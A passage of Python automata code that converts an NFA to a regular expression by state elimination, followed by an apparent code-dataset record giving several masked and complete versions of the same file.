for c in reversed(s):
out += c
return out
seq = [reverse(i) for i in seq]
return reverse(commonprefix(seq))
class NetworkNFA(NFA):
def __init__(self, nfa):
if type(nfa) is not NFA:
raise AutomataError('Can create a NetworkNFA only from an NFA.')
if all([len(i) == 1 for i in nfa.charset]):
self._charset = copy(nfa._charset)
else:
self._charset = set(['{%s}' % i for i in nfa._charset])
self._nodes = copy(nfa._nodes)
self._deltas = copyDeltas(nfa._deltas)
self._start = nfa._start
self._terminals = copy(nfa._terminals)
def addDelta(self, node, input, dest):
if set(input) - (self._charset.union(set('()+*'))):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if type(dest) is set and all([type(i) is Node for i in dest]):
if len(dest):
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input] = self._deltas[node][input].union(
dest)
else:
self._deltas[node][input] = dest
else:
self._deltas[node] = {input: dest}
elif type(dest) is Node:
if node in self._deltas:
if input in self._deltas[node]:
self._deltas[node][input].add(dest)
else:
self._deltas[node][input] = set([dest])
else:
self._deltas[node] = {input: set([dest])}
else:
raise AutomataError(
'Delta destination must be a Node or a set of nodes, not %s.' % type(dest).__name__)
else:
raise AutomataError(
'Delta source must be Node, not %s.' % type(node).__name__)
def remDelta(self, node, input):
if set(input) - (self._charset.union(set('()+*'))):
raise AutomataError('%s contains symbols not in charset.' % input)
if type(node) is Node:
if node in self._deltas and input in self._deltas[node]:
self._deltas[node].pop(input)
if len(self._deltas[node]) == 0:
del self._deltas[node]
else:
raise AutomataError(
'Delta source must be a Node, not %s' % type(node).__name__)
def isValid(self):
if len(self._nodes) == 0:
return False
if self._start not in self._nodes:
return False
for i in self._terminals:
if i not in self._nodes:
return False
if not set(self._deltas.keys()).issubset(self._nodes):
return False
for key in self._deltas:
for char in self._deltas[key]:
if set(char) - (self._charset.union(set('()+*'))):
return False
return True
def apply(self, input, start):
raise AutomataError('NetworkNFA does not allow direct application.')
def __repr__(self):
ret = '<NetworkNFA>\n'
ret += ' Charset: {%s}\n' % ','.join(filter(None, self._charset))
ret += ' Nodes: {%s}\n' % ','.join([i.label for i in self._nodes])
ret += 'Terminals: {%s}\n' % ','.join(
[i.label for i in self._terminals])
ret += ' Start: %s\n' % (self._start and self._start.label)
ret += ' Delta: '
if len(self._deltas):
for qFrom in self._deltas:
for input in self._deltas[qFrom]:
ret += 'D(%s, %s) -> {%s}\n ' % (qFrom.label, input or 'lambda', ','.join(
[i.label for i in self._deltas[qFrom][input]]))
ret = ret.rstrip() + '\n'
else:
ret += 'None\n'
ret += ' Valid: %s\n' % ('Yes' if self.isValid() else 'No')
ret += '</NetworkNFA>'
return ret
def nfa2regex(nfa):
if not nfa.isValid():
raise AutomataError(
'NFA must be in a valid state to be converted to a regex.')
network = NetworkNFA(nfa)
if DEBUG:
print('START', network)
# Take care of multi-terminals
# if len(network.terminals) > 1:
## end = Node('qf')
# network.addNode(end)
# for i in copy(network.terminals):
## network.addDelta(i, '', end)
# network.remTerminal(i)
# network.addTerminal(end)
# Add a dummy start and end nodes
start = Node('qs')
network.addNode(start)
network.addDelta(start, '', network.start)
network.start = start
end = Node('qf')
network.addNode(end)
for i in network.terminals:
network.addDelta(i, '', end)
network.remTerminal(i)
network.addTerminal(end)
if DEBUG:
print('Dummies added: ', network)
# Collapse connections
for src in network.nodes:
delta_temp = network.getDelta(src)
for dest in network.nodes:
chars = []
for input in delta_temp:
if input and dest in delta_temp[input]:
chars.append(input)
if len(chars):
for c in chars:
delta_temp[c].remove(dest)
if len(delta_temp[c]) == 0:
del delta_temp[c]
if len(chars) > 1:
chars = '(' + '+'.join(chars) + ')'
else:
chars = '+'.join(chars)
network.addDelta(src, chars, dest)
if DEBUG:
print('Collapsed: ', network)
# Collect pliable nodes
pliableNodes = list(network.nodes)
pliableNodes.remove(network.start)
for n in network.terminals:
pliableNodes.remove(n)
# Build a distance-from-terminal table
nodeFinalDist = {}
maxDist = len(network.nodes) ** len(network.nodes) # Lazy
for n in network.nodes:
nodeFinalDist[n] = maxDist
nodeFinalDist[network.terminals[0]] = 0
toProcess = list(network.nodes)
toProcess.remove(network.terminals[0])
while len(toProcess):
for node in toProcess:
dests = network.getDelta(node).values()
if len(dests) == 0:
dests = set([])
else:
dests = reduce(set.union, network.getDelta(node).values())
if len(dests) == 0:
toProcess.remove(node)
else:
minDist = min([nodeFinalDist[i] for i in dests])
if minDist != maxDist:
nodeFinalDist[node] = minDist + 1
toProcess.remove(node)
# Sort pliable nodes by distance from terminal
pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)
if DEBUG:
print('Pliables: ', pliableNodes)
for node in pliableNodes:
# Remove Node
network.remNode(node)
# Save delta
delta = copy(network.getDelta(node))
# Convert loops to regex
loops = []
for input in delta:
if node in delta[input]:
if len(input):
loops.append(input)
loopRegex = '+'.join(loops)
if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1] == ')'):
loopRegex = '(' + loopRegex + ')*'
elif len(loopRegex) >= 1:
loopRegex = loopRegex + '*'
# Remove loops
for input in copy(delta):
if delta[input] == set([node]):
del delta[input]
elif node in delta[input]:
delta[input].remove(node)
# Search lambda-closure equivalence
if '' in delta and (len(delta) != 1 or len(delta['']) != 1):
eligible = []
for dest in delta['']:
delta_temp = network.getDelta(dest)
if '' in delta_temp and node in delta_temp['']:
eligible.append(dest)
if len(eligible):
replaceNode(network, node, eligible[0])
continue
# Remove delta
try:
del network._deltas[node]
except KeyError: # No deltas remaining, had only loops
continue
if DEBUG:
print('Working on connections: ', node, delta)
# Check all possible connections through this node
deltas_temp = copyDeltas(network._deltas)
for src in deltas_temp:
for input in deltas_temp[src]:
tempDeltaDest = network.getDelta(src)[input]
if node in tempDeltaDest:
tempDeltaDest.remove(node)
if len(tempDeltaDest) == 0:
network.remDelta(src, input)
for input2 in delta:
for dest in delta[input2]:
if not (src == dest and (input + loopRegex + input2) == ''):
network.addDelta(
src, input + loopRegex + input2, dest)
if DEBUG:
print('New Delta:', src, input,
loopRegex, input2, dest, network)
# Extract common prefix/suffix
branches = network.getDelta(network.start).keys()
if len(branches) == 1:
regex = branches[0]
else:
prefix = commonprefix(branches)
suffix = commonsuffix(branches)
branches = [i[len(prefix):-len(suffix)] if len(suffix) else i[len(prefix):]
for i in branches]
branches.sort(key=len)
if len(prefix) or len(suffix):
regex = prefix + \
'(' + '+'.join([i or LAMBDA for i in branches]) + ')' + suffix
else:
regex = '+'.join([i or LAMBDA for i in branches]) or PHI
return regex
|
flexible
|
{
"blob_id": "2fe20f28fc7bba6b8188f5068e2b3c8b87c15edc",
"index": 94,
"step-1": "<mask token>\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\n<mask token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\n<mask token>\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n",
"step-4": "from util import AutomataError\nfrom automata import NFA\nfrom base import Node\nfrom copy import copy, deepcopy\nfrom os.path import commonprefix\nDEBUG = False\nLAMBDA = u'λ'\nPHI = u'Ø'\n\n\ndef copyDeltas(src):\n out = dict()\n for k in src:\n out[k] = dict()\n for k2 in src[k]:\n out[k][k2] = copy(src[k][k2])\n return out\n\n\ndef replaceNode(nfa, old, new):\n if DEBUG:\n print('R_Start(%s, %s) ---' % (old, new), nfa)\n if old in nfa._deltas:\n for input in nfa._deltas[old]:\n nfa.addDelta(new, input, nfa._deltas[old][input])\n del nfa._deltas[old]\n if DEBUG:\n print('R_SwitchedSource(%s, %s) ---' % (old, new), nfa)\n deltas_temp = copyDeltas(nfa._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n if old in deltas_temp[src][input]:\n nfa._deltas[src][input].remove(old)\n nfa._deltas[src][input].add(new)\n if DEBUG:\n print('R_SwitchedDest(%s, %s) ---' % (old, new), nfa)\n\n\ndef commonsuffix(seq):\n\n def reverse(s):\n out = ''\n for c in reversed(s):\n out += c\n return out\n seq = [reverse(i) for i in seq]\n return reverse(commonprefix(seq))\n\n\nclass NetworkNFA(NFA):\n\n def __init__(self, nfa):\n if type(nfa) is not NFA:\n raise AutomataError('Can create a NetworkNFA only from an NFA.')\n if all([(len(i) == 1) for i in nfa.charset]):\n self._charset = copy(nfa._charset)\n else:\n self._charset = set([('{%s}' % i) for i in nfa._charset])\n self._nodes = copy(nfa._nodes)\n self._deltas = copyDeltas(nfa._deltas)\n self._start = nfa._start\n self._terminals = copy(nfa._terminals)\n\n def addDelta(self, node, input, dest):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if type(dest) is set and all([(type(i) is Node) for i in dest]):\n if len(dest):\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input] = self._deltas[node][\n input].union(dest)\n else:\n self._deltas[node][input] = dest\n else:\n self._deltas[node] = {input: dest}\n elif type(dest) is Node:\n if node in self._deltas:\n if input in self._deltas[node]:\n self._deltas[node][input].add(dest)\n else:\n self._deltas[node][input] = set([dest])\n else:\n self._deltas[node] = {input: set([dest])}\n else:\n raise AutomataError(\n 'Delta destination must be a Node or a set of nodes, not %s.'\n % type(dest).__name__)\n else:\n raise AutomataError('Delta source must be Node, not %s.' % type\n (node).__name__)\n\n def remDelta(self, node, input):\n if set(input) - self._charset.union(set('()+*')):\n raise AutomataError('%s contains symbols not in charset.' % input)\n if type(node) is Node:\n if node in self._deltas and input in self._deltas[node]:\n self._deltas[node].pop(input)\n if len(self._deltas[node]) == 0:\n del self._deltas[node]\n else:\n raise AutomataError('Delta source must be a Node, not %s' %\n type(node).__name__)\n\n def isValid(self):\n if len(self._nodes) == 0:\n return False\n if self._start not in self._nodes:\n return False\n for i in self._terminals:\n if i not in self._nodes:\n return False\n if not set(self._deltas.keys()).issubset(self._nodes):\n return False\n for key in self._deltas:\n for char in self._deltas[key]:\n if set(char) - self._charset.union(set('()+*')):\n return False\n return True\n\n def apply(self, input, start):\n raise AutomataError('NetworkNFA does not allow direct application.')\n\n def __repr__(self):\n ret = '<NetworkNFA>\\n'\n ret += ' Charset: {%s}\\n' % ','.join(filter(None, self._charset))\n ret += ' Nodes: {%s}\\n' % ','.join([i.label for i in self._nodes])\n ret += 'Terminals: {%s}\\n' % ','.join([i.label for i in self.\n _terminals])\n ret += ' Start: %s\\n' % (self._start and self._start.label)\n ret += ' Delta: '\n if len(self._deltas):\n for qFrom in self._deltas:\n for input in self._deltas[qFrom]:\n ret += 'D(%s, %s) -> {%s}\\n ' % (qFrom.label, \n input or 'lambda', ','.join([i.label for i in self.\n _deltas[qFrom][input]]))\n ret = ret.rstrip() + '\\n'\n else:\n ret += 'None\\n'\n ret += ' Valid: %s\\n' % ('Yes' if self.isValid() else 'No')\n ret += '</NetworkNFA>'\n return ret\n\n\ndef nfa2regex(nfa):\n if not nfa.isValid():\n raise AutomataError(\n 'NFA must be in a valid state to be converted to a regex.')\n network = NetworkNFA(nfa)\n if DEBUG:\n print('START', network)\n start = Node('qs')\n network.addNode(start)\n network.addDelta(start, '', network.start)\n network.start = start\n end = Node('qf')\n network.addNode(end)\n for i in network.terminals:\n network.addDelta(i, '', end)\n network.remTerminal(i)\n network.addTerminal(end)\n if DEBUG:\n print('Dummies added: ', network)\n for src in network.nodes:\n delta_temp = network.getDelta(src)\n for dest in network.nodes:\n chars = []\n for input in delta_temp:\n if input and dest in delta_temp[input]:\n chars.append(input)\n if len(chars):\n for c in chars:\n delta_temp[c].remove(dest)\n if len(delta_temp[c]) == 0:\n del delta_temp[c]\n if len(chars) > 1:\n chars = '(' + '+'.join(chars) + ')'\n else:\n chars = '+'.join(chars)\n network.addDelta(src, chars, dest)\n if DEBUG:\n print('Collapsed: ', network)\n pliableNodes = list(network.nodes)\n pliableNodes.remove(network.start)\n for n in network.terminals:\n pliableNodes.remove(n)\n nodeFinalDist = {}\n maxDist = len(network.nodes) ** len(network.nodes)\n for n in network.nodes:\n nodeFinalDist[n] = maxDist\n nodeFinalDist[network.terminals[0]] = 0\n toProcess = list(network.nodes)\n toProcess.remove(network.terminals[0])\n while len(toProcess):\n for node in toProcess:\n dests = network.getDelta(node).values()\n if len(dests) == 0:\n dests = set([])\n else:\n dests = reduce(set.union, network.getDelta(node).values())\n if len(dests) == 0:\n toProcess.remove(node)\n else:\n minDist = min([nodeFinalDist[i] for i in dests])\n if minDist != maxDist:\n nodeFinalDist[node] = minDist + 1\n toProcess.remove(node)\n pliableNodes.sort(key=lambda x: nodeFinalDist[x], reverse=True)\n if DEBUG:\n print('Pliables: ', pliableNodes)\n for node in pliableNodes:\n network.remNode(node)\n delta = copy(network.getDelta(node))\n loops = []\n for input in delta:\n if node in delta[input]:\n if len(input):\n loops.append(input)\n loopRegex = '+'.join(loops)\n if len(loopRegex) > 1 and not (loopRegex[0] == '(' and loopRegex[-1\n ] == ')'):\n loopRegex = '(' + loopRegex + ')*'\n elif len(loopRegex) >= 1:\n loopRegex = loopRegex + '*'\n for input in copy(delta):\n if delta[input] == set([node]):\n del delta[input]\n elif node in delta[input]:\n delta[input].remove(node)\n if '' in delta and (len(delta) != 1 or len(delta['']) != 1):\n eligible = []\n for dest in delta['']:\n delta_temp = network.getDelta(dest)\n if '' in delta_temp and node in delta_temp['']:\n eligible.append(dest)\n if len(eligible):\n replaceNode(network, node, eligible[0])\n continue\n try:\n del network._deltas[node]\n except KeyError:\n continue\n if DEBUG:\n print('Working on connections: ', node, delta)\n deltas_temp = copyDeltas(network._deltas)\n for src in deltas_temp:\n for input in deltas_temp[src]:\n tempDeltaDest = network.getDelta(src)[input]\n if node in tempDeltaDest:\n tempDeltaDest.remove(node)\n if len(tempDeltaDest) == 0:\n network.remDelta(src, input)\n for input2 in delta:\n for dest in delta[input2]:\n if not (src == dest and input + loopRegex +\n input2 == ''):\n network.addDelta(src, input + loopRegex +\n input2, dest)\n if DEBUG:\n print('New Delta:', src, input,\n loopRegex, input2, dest, network)\n branches = network.getDelta(network.start).keys()\n if len(branches) == 1:\n regex = branches[0]\n else:\n prefix = commonprefix(branches)\n suffix = commonsuffix(branches)\n branches = [(i[len(prefix):-len(suffix)] if len(suffix) else i[len(\n prefix):]) for i in branches]\n branches.sort(key=len)\n if len(prefix) or len(suffix):\n regex = prefix + '(' + '+'.join([(i or LAMBDA) for i in branches]\n ) + ')' + suffix\n else:\n regex = '+'.join([(i or LAMBDA) for i in branches]) or PHI\n return regex\n",
